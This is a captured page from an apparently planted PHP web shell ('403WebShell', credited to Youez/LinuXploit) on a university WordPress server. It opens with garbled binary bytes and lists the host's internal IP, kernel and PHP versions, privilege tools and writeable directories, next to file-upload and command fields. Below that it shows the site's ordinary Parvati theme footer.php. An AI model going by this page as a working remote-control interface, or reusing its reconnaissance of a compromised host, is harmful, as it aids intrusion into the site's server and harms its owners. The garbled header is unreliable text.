h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/parvati/inc/structure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/parvati/inc/structure/footer.php
<?php
/**
 * Footer elements.
 *
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

if ( ! function_exists( 'parvati_construct_footer' ) ) {
	add_action( 'parvati_footer', 'parvati_construct_footer' );
	/**
	 * Build our footer.
	 *
	 */
	function parvati_construct_footer() {
		?>
		<footer class="site-info" itemtype="https://schema.org/WPFooter" itemscope="itemscope">
			<div class="inside-site-info <?php if ( 'full-width' !== parvati_get_setting( 'footer_inner_width' ) ) : ?>grid-container grid-parent<?php endif; ?>">
				<?php
				/**
				 * parvati_before_copyright hook.
				 *
				 *
				 * @hooked parvati_footer_bar - 15
				 */
				do_action( 'parvati_before_copyright' );
				?>
				<div class="copyright-bar">
					<?php
					/**
					 * parvati_credits hook.
					 *
					 *
					 * @hooked parvati_add_footer_info - 10
					 */
					do_action( 'parvati_credits' );
					?>
				</div>
			</div>
		</footer><!-- .site-info -->
		<?php
	}
}

if ( ! function_exists( 'parvati_footer_bar' ) ) {
	add_action( 'parvati_before_copyright', 'parvati_footer_bar', 15 );
	/**
	 * Build our footer bar
	 *
	 */
	function parvati_footer_bar() {
		if ( ! is_active_sidebar( 'footer-bar' ) ) {
			return;
		}
		?>
		<div class="footer-bar">
			<?php dynamic_sidebar( 'footer-bar' ); ?>
		</div>
		<?php
	}
}

if ( ! function_exists( 'parvati_add_footer_info' ) ) {
	add_action( 'parvati_credits', 'parvati_add_footer_info' );
	/**
	 * Add the copyright to the footer
	 *
	 */
	function parvati_add_footer_info() {
		$copyright = sprintf( '<span class="copyright">&copy; %1$s %2$s</span> &bull; %4$s <a href="%3$s" itemprop="url">%5$s</a>',
			date( 'Y' ),
			get_bloginfo( 'name' ),
			esc_url( PARVATI_THEME_URL ),
			_x( 'Powered by', 'WPKoi', 'parvati' ),
			__( 'WPKoi', 'parvati' )
		);

		echo apply_filters( 'parvati_copyright', $copyright ); // WPCS: XSS ok.
	}
}

/**
 * Build our individual footer widgets.
 * Displays a sample widget if no widget is found in the area.
 *
 *
 * @param int $widget_width The width class of our widget.
 * @param int $widget The ID of our widget.
 */
function parvati_do_footer_widget( $widget_width, $widget ) {
	$widget_width = apply_filters( "parvati_footer_widget_{$widget}_width", $widget_width );
	$tablet_widget_width = apply_filters( "parvati_footer_widget_{$widget}_tablet_width", '50' );
	?>
	<div class="footer-widget-<?php echo absint( $widget ); ?> grid-parent grid-<?php echo absint( $widget_width ); ?> tablet-grid-<?php echo absint( $tablet_widget_width ); ?> mobile-grid-100">
		<?php if ( ! dynamic_sidebar( 'footer-' . absint( $widget ) ) ) :
	        $current_user = wp_get_current_user();
	        if (user_can( $current_user, 'administrator' )) { ?>
			<aside class="widget inner-padding widget_text">
				<h4 class="widget-title"><?php esc_html_e( 'Footer Widget', 'parvati' );?></h4>
				<div class="textwidget">
					<p>
						<?php
						printf( // WPCS: XSS ok.
							/* translators: 1: admin URL */
							__( 'Replace this widget content by going to <a href="%1$s"><strong>Appearance / Widgets</strong></a> and dragging widgets into this widget area.', 'parvati' ),
							esc_url( admin_url( 'widgets.php' ) )
						);
						?>
					</p>
					<p>
						<?php
						printf( // WPCS: XSS ok.
							/* translators: 1: admin URL */
							__( 'To remove or choose the number of footer widgets, go to <a href="%1$s"><strong>Appearance / Customize / Layout / Footer Widgets</strong></a>.', 'parvati' ),
							esc_url( admin_url( 'customize.php' ) )
						);
						?>
					</p>
				</div>
			</aside>
		<?php } endif; ?>
	</div>
	<?php
}

if ( ! function_exists( 'parvati_construct_footer_widgets' ) ) {
	add_action( 'parvati_footer', 'parvati_construct_footer_widgets', 5 );
	/**
	 * Build our footer widgets.
	 *
	 */
	function parvati_construct_footer_widgets() {
		// Get how many widgets to show.
		$widgets = parvati_get_footer_widgets();

		if ( ! empty( $widgets ) && 0 !== $widgets ) :

			// Set up the widget width.
			$widget_width = '';
			if ( $widgets == 1 ) {
				$widget_width = '100';
			}

			if ( $widgets == 2 ) {
				$widget_width = '50';
			}

			if ( $widgets == 3 ) {
				$widget_width = '33';
			}

			if ( $widgets == 4 ) {
				$widget_width = '25';
			}

			if ( $widgets == 5 ) {
				$widget_width = '20';
			}
			?>
			<div id="footer-widgets" class="site footer-widgets">
				<div <?php parvati_inside_footer_class(); ?>>
					<div class="inside-footer-widgets">
						<?php
						if ( $widgets >= 1 ) {
							parvati_do_footer_widget( $widget_width, 1 );
						}

						if ( $widgets >= 2 ) {
							parvati_do_footer_widget( $widget_width, 2 );
						}

						if ( $widgets >= 3 ) {
							parvati_do_footer_widget( $widget_width, 3 );
						}

						if ( $widgets >= 4 ) {
							parvati_do_footer_widget( $widget_width, 4 );
						}

						if ( $widgets >= 5 ) {
							parvati_do_footer_widget( $widget_width, 5 );
						}
						?>
					</div>
				</div>
			</div>
		<?php
		endif;

		/**
		 * parvati_after_footer_widgets hook.
		 *
		 */
		do_action( 'parvati_after_footer_widgets' );
	}
}

if ( ! function_exists( 'parvati_back_to_top' ) ) {
	add_action( 'parvati_after_footer', 'parvati_back_to_top', 2 );
	/**
	 * Build the back to top button
	 *
	 */
	function parvati_back_to_top() {
		$parvati_settings = wp_parse_args(
			get_option( 'parvati_settings', array() ),
			parvati_get_defaults()
		);

		if ( 'enable' !== $parvati_settings[ 'back_to_top' ] ) {
			return;
		}

		echo apply_filters( 'parvati_back_to_top_output', sprintf( // WPCS: XSS ok.
			'<a title="%1$s" rel="nofollow" href="#" class="parvati-back-to-top" style="opacity:0;visibility:hidden;" data-scroll-speed="%2$s" data-start-scroll="%3$s">
				<span class="screen-reader-text">%5$s</span>
			</a>',
			esc_attr__( 'Scroll back to top', 'parvati' ),
			absint( apply_filters( 'parvati_back_to_top_scroll_speed', 400 ) ),
			absint( apply_filters( 'parvati_back_to_top_start_scroll', 300 ) ),
			esc_attr( apply_filters( 'parvati_back_to_top_icon', 'fa-angle-up' ) ),
			esc_html__( 'Scroll back to top', 'parvati' )
		) );
	}
}

add_action( 'parvati_after_footer', 'parvati_side_padding_footer', 5 );
/**
 * Add holder div if sidebar padding is enabled
 *
 */
function parvati_side_padding_footer() { 
	$parvati_settings = wp_parse_args(
		get_option( 'parvati_spacing_settings', array() ),
		parvati_spacing_get_defaults()
	);
	
	$fixed_side_content   =  parvati_get_setting( 'fixed_side_content' ); 
	$socials_display_side =  parvati_get_setting( 'socials_display_side' ); 
	
	if ( ( $parvati_settings[ 'side_top' ] != 0 ) || ( $parvati_settings[ 'side_right' ] != 0 ) || ( $parvati_settings[ 'side_bottom' ] != 0 ) || ( $parvati_settings[ 'side_left' ] != 0 ) ) { ?>
    	<div class="parvati-side-left-cover"></div>
    	<div class="parvati-side-right-cover"></div>
	</div>
	<?php } 
	if ( ( $fixed_side_content != '' ) || ( $socials_display_side == true ) ) { ?>
    <div class="parvati-side-left-content">
        <?php if ( $socials_display_side == true ) { ?>
        <div class="parvati-side-left-socials">
        <?php do_action( 'parvati_social_bar_action' ); ?>
        </div>
        <?php } ?>
        <?php if ( $fixed_side_content != '' ) { ?>
    	<div class="parvati-side-left-text">
        <?php echo wp_kses_post( $fixed_side_content ); ?>
        </div>
        <?php } ?>
    </div>
    <?php
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit